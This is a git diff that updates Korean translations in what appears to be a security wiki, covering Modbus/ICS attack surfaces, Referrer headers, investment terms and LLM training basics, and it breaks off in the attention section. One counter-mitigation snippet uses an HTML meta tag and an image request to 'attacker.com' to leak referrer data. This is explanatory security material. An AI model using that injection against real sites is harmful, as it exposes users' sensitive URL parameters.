+이 시스템을 보호하는 것이 중요해졌습니다. 왜냐하면 이를 손상시키는 데는 많은 비용이 들 수 있으며 최악의 경우 생명까지 위협할 수 있기 때문입니다. 산업 제어 시스템 보안을 이해하기 위해서는 내부 구조를 아는 것이 필요합니다.
 
 산업 제어 시스템은 정해진 표준에 따라 설치되므로 각 구성 요소를 아는 것이 제어 시스템의 다른 모든 메커니즘을 상호 연결하는 데 도움이 됩니다. PLC 및 SCADA 시스템과 같은 이러한 장치의 설치는 다양한 산업에서 다르므로 정보 수집이 중요합니다.
 
diff --git a/src/todo/industrial-control-systems-hacking/modbus.md b/src/todo/industrial-control-systems-hacking/modbus.md
index b1407c76b..01465b22e 100644
--- a/src/todo/industrial-control-systems-hacking/modbus.md
+++ b/src/todo/industrial-control-systems-hacking/modbus.md
@@ -4,15 +4,15 @@
 
 Modbus 프로토콜은 산업 자동화 및 제어 시스템에서 널리 사용되는 프로토콜입니다. Modbus는 프로그래머블 로직 컨트롤러(PLC), 센서, 액추에이터 및 기타 산업 장치와 같은 다양한 장치 간의 통신을 허용합니다. Modbus 프로토콜을 이해하는 것은 ICS에서 가장 많이 사용되는 통신 프로토콜이며, 스니핑 및 PLC에 명령을 주입할 수 있는 많은 잠재적 공격 표면이 있기 때문에 필수적입니다.
 
-여기서는 프로토콜의 맥락과 작동 방식을 제공하는 개념이 포인트별로 설명됩니다. ICS 시스템 보안의 가장 큰 도전 과제는 구현 및 업그레이드 비용입니다. 이러한 프로토콜과 표준은 80년대와 90년대 초기에 설계되었으며 여전히 널리 사용되고 있습니다. 산업에는 많은 장치와 연결이 있기 때문에 장치를 업그레이드하는 것이 매우 어렵고, 이는 해커에게 구식 프로토콜을 다룰 수 있는 우위를 제공합니다. Modbus에 대한 공격은 업그레이드 없이 사용될 것이기 때문에 사실상 피할 수 없습니다. 이는 산업에 중요한 작동입니다.
+여기서는 프로토콜의 맥락과 작동 방식을 제공하는 개념이 포인트별로 설명됩니다. ICS 시스템 보안의 가장 큰 도전 과제는 구현 및 업그레이드 비용입니다. 이러한 프로토콜과 표준은 80년대와 90년대 초기에 설계되었으며 여전히 널리 사용되고 있습니다. 산업에는 많은 장치와 연결이 있기 때문에 장치를 업그레이드하는 것이 매우 어렵고, 이는 해커에게 구식 프로토콜을 다룰 수 있는 우위를 제공합니다. Modbus에 대한 공격은 업그레이드 없이 사용될 것이기 때문에 사실상 피할 수 없는 상황입니다. 이는 산업에 중요한 작동이기 때문입니다.
 
 ## 클라이언트-서버 아키텍처
 
-Modbus 프로토콜은 일반적으로 클라이언트-서버 아키텍처로 사용되며, 여기서 마스터 장치(클라이언트)가 하나 이상의 슬레이브 장치(서버)와 통신을 시작합니다. 이는 전자 및 IoT에서 SPI, I2C 등과 함께 널리 사용되는 마스터-슬레이브 아키텍처라고도 합니다.
+Modbus 프로토콜은 일반적으로 클라이언트-서버 아키텍처에서 사용되며, 여기서 마스터 장치(클라이언트)가 하나 이상의 슬레이브 장치(서버)와 통신을 시작합니다. 이는 전자기기 및 IoT에서 SPI, I2C 등과 함께 널리 사용되는 마스터-슬레이브 아키텍처라고도 합니다.
 
 ## 직렬 및 이더넷 버전
 
-Modbus 프로토콜은 직렬 통신과 이더넷 통신 모두를 위해 설계되었습니다. 직렬 통신은 레거시 시스템에서 널리 사용되는 반면, 현대 장치는 높은 데이터 전송 속도를 제공하고 현대 산업 네트워크에 더 적합한 이더넷을 지원합니다.
+Modbus 프로토콜은 직렬 통신과 이더넷 통신 모두를 위해 설계되었습니다. 직렬 통신은 레거시 시스템에서 널리 사용되는 반면, 현대 장치는 이더넷을 지원하여 높은 데이터 전송 속도를 제공하며 현대 산업 네트워크에 더 적합합니다.
 
 ## 데이터 표현
 
@@ -20,11 +20,11 @@ Modbus 프로토콜에서 데이터는 ASCII 또는 이진 형식으로 전송
 
 ## 기능 코드
 
-ModBus 프로토콜은 PLC 및 다양한 제어 장치를 작동하는 데 사용되는 특정 기능 코드의 전송으로 작동합니다. 이 부분은 기능 코드를 재전송하여 재생 공격을 수행할 수 있기 때문에 이해하는 것이 중요합니다. 레거시 장치는 데이터 전송에 대한 암호화를 지원하지 않으며, 일반적으로 이들을 연결하는 긴 전선이 있어 이러한 전선을 변조하고 데이터를 캡처/주입할 수 있습니다.
+ModBus 프로토콜은 PLC 및 다양한 제어 장치를 작동시키는 데 사용되는 특정 기능 코드의 전송으로 작동합니다. 이 부분은 기능 코드를 재전송하여 재생 공격을 수행할 수 있기 때문에 이해하는 것이 중요합니다. 레거시 장치는 데이터 전송에 대한 암호화를 지원하지 않으며, 일반적으로 긴 전선으로 연결되어 있어 이러한 전선의 변조 및 데이터 캡처/주입이 발생할 수 있습니다.
 
 ## Modbus의 주소 지정
 
-네트워크의 각 장치는 장치 간 통신에 필수적인 고유한 주소를 가지고 있습니다. Modbus RTU, Modbus TCP 등과 같은 프로토콜이 주소 지정을 구현하는 데 사용되며 데이터 전송을 위한 전송 계층 역할을 합니다. 전송되는 데이터는 메시지를 포함하는 Modbus 프로토콜 형식입니다.
+네트워크의 각 장치는 장치 간 통신에 필수적인 고유한 주소를 가지고 있습니다. Modbus RTU, Modbus TCP 등과 같은 프로토콜이 주소 지정을 구현하는 데 사용되며, 데이터 전송을 위한 전송 계층 역할을 합니다. 전송되는 데이터는 메시지를 포함하는 Modbus 프로토콜 형식입니다.
 
 또한, Modbus는 전송된 데이터의 무결성을 보장하기 위해 오류 검사를 구현합니다. 그러나 가장 중요한 것은 Modbus가 오픈 표준이라는 점이며, 누구나 자신의 장치에 이를 구현할 수 있습니다. 이로 인해 이 프로토콜은 글로벌 표준으로 자리 잡았으며 산업 자동화 산업에서 널리 퍼져 있습니다.
 
diff --git a/src/todo/interesting-http.md b/src/todo/interesting-http.md
index 82f8e9928..84426eb22 100644
--- a/src/todo/interesting-http.md
+++ b/src/todo/interesting-http.md
@@ -6,7 +6,7 @@ Referrer는 브라우저가 이전에 방문한 페이지를 나타내기 위해
 
 ## 민감한 정보 유출
 
-웹 페이지 내에서 GET 요청 매개변수에 민감한 정보가 포함되어 있는 경우, 페이지에 외부 소스에 대한 링크가 포함되어 있거나 공격자가 사용자가 공격자가 제어하는 URL을 방문하도록 만들거나 제안할 수 있는 경우(소셜 엔지니어링). 이 경우 최신 GET 요청 내의 민감한 정보를 유출할 수 있습니다.
+웹 페이지 내에서 GET 요청 매개변수에 민감한 정보가 위치하는 경우, 페이지에 외부 소스에 대한 링크가 포함되어 있거나 공격자가 사용자가 공격자가 제어하는 URL을 방문하도록 만들거나 제안할 수 있는 경우(소셜 엔지니어링). 이 경우 최신 GET 요청 내의 민감한 정보를 유출할 수 있습니다.
 
 ## 완화
 
@@ -23,7 +23,7 @@ Referrer-Policy: unsafe-url
 ```
 ## Counter-Mitigation
 
-이 규칙은 HTML 메타 태그를 사용하여 무시할 수 있습니다(공격자는 HTML 주입을 이용해야 합니다):
+이 규칙은 HTML 메타 태그를 사용하여 무시할 수 있습니다(공격자는 HTML 주입을 이용해야 함):
 ```markup
 <meta name="referrer" content="unsafe-url">
 <img src="https://attacker.com">
diff --git a/src/todo/investment-terms.md b/src/todo/investment-terms.md
index 986b310a1..908a85155 100644
--- a/src/todo/investment-terms.md
+++ b/src/todo/investment-terms.md
@@ -6,15 +6,15 @@
 
 보통 **현재 시장 가격**을 사용하여 가능한 한 빨리 거래를 수행할 수 있습니다.
 
-**손절매 - 한도**: 자산의 구매 또는 판매 가격과 양을 지정하면서, 손실을 방지하기 위해 도달할 경우의 낮은 가격도 지정할 수 있습니다.
+**손절매 - 한도**: 자산의 구매 또는 판매 가격과 양을 지정하면서, 손실을 방지하기 위해 도달할 경우의 더 낮은 가격도 지정할 수 있습니다.
 
 ## 선물
 
-선물은 두 당사자가 **미래에 고정된 가격으로 무언가를 인수하기로 합의하는 계약**입니다. 예를 들어, 6개월 후 70,000$에 1 비트코인을 판매하는 것입니다.
+선물은 두 당사자가 **미래의 고정 가격으로 무언가를 인수하기로 합의하는 계약**입니다. 예를 들어, 6개월 후 70,000$에 1 비트코인을 판매하는 것입니다.
 
 물론 6개월 후 비트코인 가치가 80,000$이면 판매자는 손실을 보고 구매자는 이익을 얻습니다. 6개월 후 비트코인 가치가 60,000$이면 반대의 상황이 발생합니다.
 
-그러나 이는 제품을 생산하고 비용을 지불할 가격에 판매할 수 있는 보장을 필요로 하는 비즈니스에 흥미롭습니다. 또는 미래에 더 높은 가격으로 고정된 가격을 보장하고자 하는 비즈니스에도 해당됩니다.
+그러나 이는 제품을 생산하고 비용을 지불할 가격에 판매할 수 있는 보장을 필요로 하는 비즈니스에 흥미롭습니다. 또는 더 높은 가격에도 불구하고 미래에 고정 가격을 보장하고자 하는 비즈니스에 유용합니다.
 
 거래소에서는 일반적으로 이익을 얻기 위해 사용됩니다.
 
@@ -23,15 +23,15 @@
 
 ### 선물로 헤지하기 <a href="#mntl-sc-block_7-0" id="mntl-sc-block_7-0"></a>
 
-펀드 매니저가 일부 주식이 하락할까 두려워하면 비트코인이나 S&P 500 선물 계약과 같은 자산에 대해 숏 포지션을 취할 수 있습니다. 이는 자산을 구매하거나 보유하고 있는 것과 유사하며, 미래에 더 높은 가격으로 판매하는 계약을 생성하는 것입니다.&#x20;
+펀드 매니저가 일부 주식이 하락할까 두려워한다면 비트코인이나 S&P 500 선물 계약과 같은 자산에 대해 숏 포지션을 취할 수 있습니다. 이는 자산을 보유하거나 구매하고, 미래의 더 높은 가격에 판매하는 계약을 만드는 것과 유사합니다.
 
 가격이 하락할 경우 펀드 매니저는 더 높은 가격에 자산을 판매하여 이익을 얻습니다. 자산 가격이 상승하면 매니저는 그 이익을 얻지 못하지만 여전히 자산을 보유하게 됩니다.
 
 ### 영구 선물
 
-**이들은 무기한 지속되는 "선물"입니다** (종료 계약 날짜가 없습니다). 암호화폐 거래소에서 가격에 따라 선물에 들어가고 나가는 것이 매우 일반적입니다.
+**이는 무기한 지속되는 "선물"입니다** (종료 계약 날짜가 없습니다). 암호화폐 거래소에서 가격에 따라 선물에 들어가고 나가는 것이 매우 일반적입니다.
 
-이 경우 이익과 손실이 실시간으로 발생할 수 있으며, 가격이 1% 상승하면 1%의 이익을 얻고, 가격이 1% 하락하면 손실을 보게 됩니다.
+이 경우 이익과 손실은 실시간으로 발생할 수 있으며, 가격이 1% 상승하면 1%의 이익을 얻고, 가격이 1% 하락하면 손실을 보게 됩니다.
 
 ### 레버리지 있는 선물
 
@@ -44,23 +44,23 @@
 
 ## 선물과 옵션의 차이점
 
-선물과 옵션의 주요 차이점은 계약이 구매자에게 선택적이라는 것입니다: 그는 이를 실행할지 여부를 결정할 수 있습니다 (보통 이익이 있을 경우에만 실행합니다). 판매자는 구매자가 옵션을 사용하고자 할 경우 판매해야 합니다.\
+선물과 옵션의 주요 차이점은 계약이 구매자에게 선택적이라는 것입니다: 구매자는 이를 실행할지 여부를 결정할 수 있습니다 (보통 이익이 있을 경우에만 실행합니다). 판매자는 구매자가 옵션을 사용하고자 할 경우 판매해야 합니다.\
 그러나 구매자는 옵션을 열기 위해 판매자에게 일부 수수료를 지불해야 합니다 (따라서 더 많은 위험을 감수하는 판매자는 일부 돈을 벌기 시작합니다).
 
 ### 1. **의무 vs. 권리:**
 
 * **선물:** 선물 계약을 구매하거나 판매할 때, 특정 날짜에 특정 가격으로 자산을 구매하거나 판매하기 위한 **구속력 있는 계약**에 들어가는 것입니다. 구매자와 판매자 모두 계약 만료 시 이를 이행할 **의무가** 있습니다 (계약이 그 전에 종료되지 않는 한).
-* **옵션:** 옵션의 경우, 특정 만료 날짜 이전 또는 해당 날짜에 특정 가격으로 자산을 구매(콜 옵션의 경우)하거나 판매(풋 옵션의 경우)할 **권리, 그러나 의무는 없습니다**. **구매자**는 실행할 선택권이 있으며, **판매자**는 구매자가 옵션을 행사하기로 결정할 경우 거래를 이행해야 할 의무가 있습니다.
+* **옵션:** 옵션의 경우, 특정 가격으로 자산을 구매(콜 옵션의 경우)하거나 판매(풋 옵션의 경우)할 **권리, 그러나 의무는 없습니다**. **구매자**는 실행할 선택권이 있으며, **판매자**는 구매자가 옵션을 행사하기로 결정할 경우 거래를 이행해야 할 의무가 있습니다.
 
 ### 2. **위험:**
 
 * **선물:** 구매자와 판매자 모두 **무제한 위험**을 감수합니다. 위험은 만료 날짜에 합의된 가격과 시장 가격의 차이입니다.
-* **옵션:** 구매자의 위험은 옵션을 구매하기 위해 지불한 **프리미엄**으로 제한됩니다. 시장이 옵션 보유자에게 유리하게 움직이지 않으면, 옵션을 단순히 만료시킬 수 있습니다. 그러나 옵션의 **판매자**(작성자)는 시장이 그들에게 불리하게 크게 움직일 경우 무제한 위험을 감수합니다.
+* **옵션:** 구매자의 위험은 옵션을 구매하기 위해 지불한 **프리미엄**으로 제한됩니다. 시장이 옵션 보유자에게 유리하게 움직이지 않으면, 단순히 옵션이 만료되도록 할 수 있습니다. 그러나 옵션의 **판매자**(작성자)는 시장이 그들에게 불리하게 크게 움직일 경우 무제한 위험을 감수합니다.
 
 ### 3. **비용:**
 
-* **선물:** 포지션을 유지하기 위해 필요한 마진 외에 선불 비용이 없으며, 구매자와 판매자 모두 거래를 완료할 의무가 있습니다.
-* **옵션:** 구매자는 옵션을 행사할 권리를 위해 **옵션 프리미엄**을 선불로 지불해야 합니다. 이 프리미엄은 본질적으로 옵션의 비용입니다.
+* **선물:** 포지션을 유지하기 위해 필요한 마진 외에 선물 계약에 대한 선불 비용이 없습니다. 구매자와 판매자 모두 거래를 완료할 의무가 있기 때문입니다.
+* **옵션:** 구매자는 옵션을 행사할 권리를 얻기 위해 **옵션 프리미엄**을 선불로 지불해야 합니다. 이 프리미엄은 본질적으로 옵션의 비용입니다.
 
 ### 4. **이익 잠재력:**
 
diff --git a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
index 4f78b38b7..7b711c8c2 100644
--- a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
+++ b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
@@ -2,7 +2,7 @@
 
 ## 사전 훈련
 
-사전 훈련은 대규모 언어 모델(LLM)을 개발하는 데 있어 기초적인 단계로, 모델이 방대한 양의 다양한 텍스트 데이터에 노출되는 과정입니다. 이 단계에서 **LLM은 언어의 기본 구조, 패턴 및 뉘앙스를 학습합니다**, 문법, 어휘, 구문 및 맥락적 관계를 포함합니다. 이 방대한 데이터를 처리함으로써 모델은 언어와 일반 세계 지식에 대한 폭넓은 이해를 얻게 됩니다. 이 포괄적인 기반은 LLM이 일관되고 맥락적으로 관련된 텍스트를 생성할 수 있게 합니다. 이후, 이 사전 훈련된 모델은 특정 작업이나 도메인에 맞게 능력을 조정하기 위해 전문 데이터셋에서 추가 훈련을 받는 미세 조정 과정을 거칠 수 있으며, 이는 목표 애플리케이션에서의 성능과 관련성을 향상시킵니다.
+사전 훈련은 대규모 언어 모델(LLM)을 개발하는 데 있어 기초적인 단계로, 모델이 방대한 양의 다양한 텍스트 데이터에 노출되는 과정입니다. 이 단계에서 **LLM은 언어의 기본 구조, 패턴 및 뉘앙스를 학습합니다**, 여기에는 문법, 어휘, 구문 및 맥락적 관계가 포함됩니다. 이 방대한 데이터를 처리함으로써 모델은 언어와 일반 세계 지식에 대한 폭넓은 이해를 얻게 됩니다. 이 포괄적인 기반은 LLM이 일관되고 맥락적으로 관련된 텍스트를 생성할 수 있게 합니다. 이후, 이 사전 훈련된 모델은 특정 작업이나 도메인에 맞게 기능을 조정하기 위해 전문 데이터셋에서 추가 훈련을 받는 미세 조정 과정을 거칠 수 있으며, 이는 목표 애플리케이션에서의 성능과 관련성을 향상시킵니다.
 
 ## 주요 LLM 구성 요소
 
@@ -47,7 +47,7 @@ PyTorch에서 **텐서**는 다차원 배열로서 스칼라, 벡터 및 행렬
 
 PyTorch 텐서는 숫자 데이터를 저장하고 조작하는 능력에서 NumPy 배열과 유사하지만, 딥 러닝에 중요한 추가 기능을 제공합니다:
 
-- **자동 미분**: PyTorch 텐서는 기울기(autograd)의 자동 계산을 지원하여 신경망 훈련에 필요한 미분을 계산하는 과정을 단순화합니다.
+- **자동 미분**: PyTorch 텐서는 기울기(autograd)의 자동 계산을 지원하여 신경망 훈련에 필요한 도함수를 계산하는 과정을 단순화합니다.
 - **GPU 가속**: PyTorch의 텐서는 GPU로 이동하여 계산할 수 있어 대규모 계산을 크게 가속화합니다.
 
 ### PyTorch에서 텐서 생성하기
@@ -125,15 +125,15 @@ result = tensor2d @ tensor2d.T
 
 ## Automatic Differentiation
 
-Automatic differentiation (AD)은 함수의 **도함수(기울기)**를 효율적이고 정확하게 평가하는 데 사용되는 계산 기술입니다. 신경망의 맥락에서 AD는 **경량 하강법**과 같은 **최적화 알고리즘**에 필요한 기울기를 계산할 수 있게 합니다. PyTorch는 이 과정을 간소화하는 **autograd**라는 자동 미분 엔진을 제공합니다.
+Automatic differentiation (AD)은 함수의 **도함수(기울기)**를 효율적이고 정확하게 평가하는 데 사용되는 계산 기술입니다. 신경망의 맥락에서 AD는 **경량 하강법**과 같은 최적화 알고리즘에 필요한 기울기를 계산할 수 있게 합니다. PyTorch는 이 과정을 간소화하는 **autograd**라는 자동 미분 엔진을 제공합니다.
 
 ### Mathematical Explanation of Automatic Differentiation
 
 **1. The Chain Rule**
 
-자동 미분의 핵심은 미적분학의 **연쇄 법칙**입니다. 연쇄 법칙은 함수의 조합이 있을 때, 합성 함수의 도함수는 구성된 함수의 도함수의 곱이라는 것을 말합니다.
+자동 미분의 핵심은 미적분학의 **연쇄 법칙**입니다. 연쇄 법칙은 함수의 조합이 있을 때, 합성 함수의 도함수는 조합된 함수의 도함수의 곱이라는 것을 말합니다.
 
-수학적으로, `y=f(u)`이고 `u=g(x)`일 때, `y`의 `x`에 대한 도함수는 다음과 같습니다:
+수학적으로, `y=f(u)`이고 `u=g(x)`일 때, `y`의 `x`에 대한 도함수는:
 
 <figure><img src="../../images/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
@@ -203,7 +203,7 @@ Gradient w.r.t b: tensor([-0.0817])
 
 - **순전파:** 각 층을 통해 입력을 전달하여 네트워크의 출력을 계산합니다.
 - **손실 계산:** 네트워크의 출력과 목표 레이블을 사용하여 손실 함수를 평가합니다.
-- **역전파 (Backpropagation):** 출력층에서 입력층으로 재귀적으로 체인 룰을 적용하여 네트워크의 각 매개변수에 대한 손실의 기울기를 계산합니다.
+- **역전파 (Backpropagation):** 출력층에서 입력층으로 체인 룰을 재귀적으로 적용하여 네트워크의 각 매개변수에 대한 손실의 기울기를 계산합니다.
 
 ### **2. 역전파 알고리즘**
 
@@ -270,7 +270,7 @@ print(f"Gradient of {name}: {param.grad}")
 - **Backward Pass:** `loss.backward()`는 손실에 대한 모든 매개변수의 기울기를 계산합니다.
 - **Parameter Update:** `optimizer.step()`는 계산된 기울기를 기반으로 매개변수를 업데이트합니다.
 
-### **5. Understanding Backward Pass**
+### **5. Backward Pass 이해하기**
 
 역전파 동안:
 
@@ -278,7 +278,7 @@ print(f"Gradient of {name}: {param.grad}")
 - 각 연산에 대해 체인 룰을 적용하여 기울기를 계산합니다.
 - 기울기는 각 매개변수 텐서의 `.grad` 속성에 누적됩니다.
 
-### **6. Advantages of Automatic Differentiation**
+### **6. 자동 미분의 장점**
 
 - **Efficiency:** 중간 결과를 재사용하여 중복 계산을 피합니다.
 - **Accuracy:** 기계 정밀도까지 정확한 도함수를 제공합니다.
diff --git a/src/todo/llm-training-data-preparation/1.-tokenizing.md b/src/todo/llm-training-data-preparation/1.-tokenizing.md
index 3cd15b031..5e96e5428 100644
--- a/src/todo/llm-training-data-preparation/1.-tokenizing.md
+++ b/src/todo/llm-training-data-preparation/1.-tokenizing.md
@@ -2,20 +2,20 @@
 
 ## 토큰화
 
-**토큰화**는 텍스트와 같은 데이터를 더 작고 관리 가능한 조각인 _토큰_으로 나누는 과정입니다. 각 토큰은 고유한 숫자 식별자(ID)가 할당됩니다. 이는 기계 학습 모델, 특히 자연어 처리(NLP)를 위한 텍스트 준비의 기본 단계입니다.
+**토큰화**는 텍스트와 같은 데이터를 더 작고 관리 가능한 조각인 _토큰_으로 분해하는 과정입니다. 각 토큰은 고유한 숫자 식별자(ID)가 할당됩니다. 이는 기계 학습 모델, 특히 자연어 처리(NLP)를 위한 텍스트 준비의 기본 단계입니다.
 
 > [!TIP]
-> 이 초기 단계의 목표는 매우 간단합니다: **입력을 의미 있는 방식으로 토큰(IDs)으로 나누기**입니다.
+> 이 초기 단계의 목표는 매우 간단합니다: **입력을 의미 있는 방식으로 토큰(IDs)으로 나누기**.
 
 ### **토큰화 작동 방식**
 
 1. **텍스트 분할:**
-- **기본 토크나이저:** 간단한 토크나이저는 텍스트를 개별 단어와 구두점으로 나누고 공백을 제거할 수 있습니다.
+- **기본 토크나이저:** 간단한 토크나이저는 텍스트를 개별 단어와 구두점으로 분할하고 공백을 제거할 수 있습니다.
 - _예시:_\
 텍스트: `"Hello, world!"`\
 토큰: `["Hello", ",", "world", "!"]`
 2. **어휘 생성:**
-- 토큰을 숫자 ID로 변환하기 위해 **어휘**가 생성됩니다. 이 어휘는 모든 고유 토큰(단어 및 기호)을 나열하고 각 토큰에 특정 ID를 할당합니다.
+- 토큰을 숫자 ID로 변환하기 위해 **어휘**가 생성됩니다. 이 어휘는 모든 고유한 토큰(단어 및 기호)을 나열하고 각 토큰에 특정 ID를 할당합니다.
 - **특수 토큰:** 다양한 시나리오를 처리하기 위해 어휘에 추가된 특수 기호입니다:
 - `[BOS]` (시퀀스 시작): 텍스트의 시작을 나타냅니다.
 - `[EOS]` (시퀀스 끝): 텍스트의 끝을 나타냅니다.
@@ -31,28 +31,28 @@
 
 ### **고급 토큰화 방법**
 
-기본 토크나이저는 간단한 텍스트에 잘 작동하지만, 특히 큰 어휘와 새로운 또는 희귀한 단어를 처리하는 데 한계가 있습니다. 고급 토큰화 방법은 텍스트를 더 작은 하위 단위로 나누거나 토큰화 프로세스를 최적화하여 이러한 문제를 해결합니다.
+기본 토크나이저는 간단한 텍스트에 잘 작동하지만, 특히 큰 어휘와 새로운 또는 희귀한 단어를 처리하는 데 한계가 있습니다. 고급 토큰화 방법은 텍스트를 더 작은 하위 단위로 분해하거나 토큰화 프로세스를 최적화하여 이러한 문제를 해결합니다.
 
 1. **바이트 쌍 인코딩(BPE):**
-- **목적:** 어휘의 크기를 줄이고 희귀하거나 알 수 없는 단어를 자주 발생하는 바이트 쌍으로 나누어 처리합니다.
+- **목적:** 어휘의 크기를 줄이고 희귀하거나 알 수 없는 단어를 자주 발생하는 바이트 쌍으로 분해하여 처리합니다.
 - **작동 방식:**
 - 개별 문자를 토큰으로 시작합니다.
-- 가장 자주 발생하는 토큰 쌍을 반복적으로 병합하여 단일 토큰으로 만듭니다.
-- 더 이상 병합할 수 있는 자주 발생하는 쌍이 없을 때까지 계속합니다.
+- 가장 빈번한 토큰 쌍을 반복적으로 병합하여 단일 토큰으로 만듭니다.
+- 더 이상 병합할 수 있는 빈번한 쌍이 없을 때까지 계속합니다.
 - **장점:**
 - 모든 단어가 기존 하위 단어 토큰을 결합하여 표현될 수 있으므로 `[UNK]` 토큰이 필요 없습니다.
 - 더 효율적이고 유연한 어휘입니다.
 - _예시:_\
-`"playing"`은 `"play"`와 `"ing"`가 자주 발생하는 하위 단어라면 `["play", "ing"]`로 토큰화될 수 있습니다.
+`"playing"`은 `"play"`와 `"ing"`가 빈번한 하위 단어라면 `["play", "ing"]`로 토큰화될 수 있습니다.
 2. **WordPiece:**
 - **사용 모델:** BERT와 같은 모델.
-- **목적:** BPE와 유사하게, 알 수 없는 단어를 처리하고 어휘 크기를 줄이기 위해 단어를 하위 단위로 나눕니다.
+- **목적:** BPE와 유사하게, 알 수 없는 단어를 처리하고 어휘 크기를 줄이기 위해 단어를 하위 단위로 분해합니다.
 - **작동 방식:**
 - 개별 문자의 기본 어휘로 시작합니다.
-- 훈련 데이터의 가능성을 극대화하는 가장 자주 발생하는 하위 단어를 반복적으로 추가합니다.
+- 훈련 데이터의 가능성을 극대화하는 가장 빈번한 하위 단어를 반복적으로 추가합니다.
 - 어떤 하위 단어를 병합할지 결정하기 위해 확률 모델을 사용합니다.
 - **장점:**
-- 관리 가능한 어휘 크기와 효과적인 단어 표현 간의 균형을 유지합니다.
+- 관리 가능한 어휘 크기와 효과적으로 단어를 표현하는 것 사이의 균형을 유지합니다.
 - 희귀하고 복합적인 단어를 효율적으로 처리합니다.
 - _예시:_\
 `"unhappiness"`는 어휘에 따라 `["un", "happiness"]` 또는 `["un", "happy", "ness"]`로 토큰화될 수 있습니다.
diff --git a/src/todo/llm-training-data-preparation/3.-token-embeddings.md b/src/todo/llm-training-data-preparation/3.-token-embeddings.md
index 74a22e0db..ec4441210 100644
--- a/src/todo/llm-training-data-preparation/3.-token-embeddings.md
+++ b/src/todo/llm-training-data-preparation/3.-token-embeddings.md
@@ -2,7 +2,7 @@
 
 ## 토큰 임베딩
 
-텍스트 데이터를 토큰화한 후, GPT와 같은 대형 언어 모델(LLM)을 훈련하기 위한 데이터 준비의 다음 중요한 단계는 **토큰 임베딩**을 생성하는 것입니다. 토큰 임베딩은 이산 토큰(예: 단어 또는 하위 단어)을 모델이 처리하고 학습할 수 있는 연속적인 수치 벡터로 변환합니다. 이 설명은 토큰 임베딩, 초기화, 사용법 및 토큰 시퀀스에 대한 모델 이해를 향상시키는 위치 임베딩의 역할을 분해합니다.
+텍스트 데이터를 토큰화한 후, GPT와 같은 대형 언어 모델(LLM)을 훈련하기 위한 데이터 준비의 다음 중요한 단계는 **토큰 임베딩**을 생성하는 것입니다. 토큰 임베딩은 이산 토큰(예: 단어 또는 하위 단어)을 모델이 처리하고 학습할 수 있는 연속적인 수치 벡터로 변환합니다. 이 설명은 토큰 임베딩, 초기화, 사용법 및 모델이 토큰 시퀀스를 이해하는 데 도움을 주는 위치 임베딩의 역할을 분해합니다.
 
 > [!TIP]
 > 이 세 번째 단계의 목표는 매우 간단합니다: **어휘의 이전 각 토큰에 원하는 차원의 벡터를 할당하여 모델을 훈련시키는 것입니다.** 어휘의 각 단어는 X 차원의 공간에서 한 점이 됩니다.\
@@ -10,7 +10,7 @@
 >
 > 게다가, 토큰 임베딩 동안 **또 다른 임베딩 레이어가 생성됩니다**. 이는 (이 경우) **훈련 문장에서 단어의 절대 위치를 나타냅니다**. 이렇게 하면 문장에서 서로 다른 위치에 있는 단어는 서로 다른 표현(의미)을 갖게 됩니다.
 
-### **토큰 임베딩이란?**
+### **토큰 임베딩이란 무엇인가?**
 
 **토큰 임베딩**은 연속 벡터 공간에서 토큰의 수치적 표현입니다. 어휘의 각 토큰은 고정된 차원의 고유한 벡터와 연결됩니다. 이러한 벡터는 토큰에 대한 의미적 및 구문적 정보를 캡처하여 모델이 데이터의 관계와 패턴을 이해할 수 있도록 합니다.
 
@@ -127,8 +127,8 @@ cssCopy codeBatch
 
 ### **위치 임베딩이 필요한 이유:**
 
-- **토큰 순서가 중요함:** 문장에서 의미는 종종 단어의 순서에 따라 달라집니다. 예를 들어, "고양이가 매트 위에 앉았다"와 "매트가 고양이 위에 앉았다."
-- **임베딩 한계:** 위치 정보가 없으면 모델은 토큰을 "단어의 가방"으로 취급하여 순서를 무시합니다.
+- **토큰 순서의 중요성:** 문장에서 의미는 종종 단어의 순서에 따라 달라집니다. 예를 들어, "고양이가 매트 위에 앉았다"와 "매트가 고양이 위에 앉았다."
+- **임베딩 한계:** 위치 정보가 없으면 모델은 토큰을 "단어의 가방"으로 취급하여 시퀀스를 무시합니다.
 
 ### **위치 임베딩의 유형:**
 
@@ -144,7 +144,7 @@ cssCopy codeBatch
 ### **위치 임베딩의 통합 방법:**
 
 - **동일한 차원:** 위치 임베딩은 토큰 임베딩과 동일한 차원을 가집니다.
-- **덧셈:** 위치 임베딩은 토큰 임베딩에 추가되어 토큰의 정체성과 위치 정보를 결합하지만 전체 차원을 증가시키지는 않습니다.
+- **덧셈:** 위치 임베딩은 토큰 임베딩에 추가되어 토큰의 정체성과 위치 정보를 결합하지만 전체 차원은 증가하지 않습니다.
 
 **위치 임베딩 추가 예시:**
 
diff --git a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
index ae8342ccb..0f86b0eea 100644
--- a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
+++ b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
@@ -1,141 +1,142 @@
-# 4. Attention Mechanisms
+# 4. 주의 메커니즘
 
-## Attention Mechanisms and Self-Attention in Neural Networks
+## 신경망에서의 주의 메커니즘과 자기 주의
 
-Attention mechanisms allow neural networks to f**ocus on specific parts of the input when generating each part of the output**. They assign different weights to different inputs, helping the model decide which inputs are most relevant to the task at hand. This is crucial in tasks like machine translation, where understanding the context of the entire sentence is necessary for accurate translation.
+주의 메커니즘은 신경망이 **출력의 각 부분을 생성할 때 입력의 특정 부분에 집중할 수 있도록** 합니다. 이들은 서로 다른 입력에 서로 다른 가중치를 할당하여 모델이 현재 작업에 가장 관련성이 높은 입력을 결정하는 데 도움을 줍니다. 이는 기계 번역과 같은 작업에서 전체 문장의 맥락을 이해하는 것이 정확한 번역에 필요하기 때문에 중요합니다.
 
 > [!TIP]
-> 이 네 번째 단계의 목표는 매우 간단합니다: **일부 주의 메커니즘을 적용하세요**. 이것들은 **어휘의 단어와 현재 LLM 훈련에 사용되는 문장에서의 이웃 간의 관계를 포착하는 많은 **반복 레이어**가 될 것입니다**.\
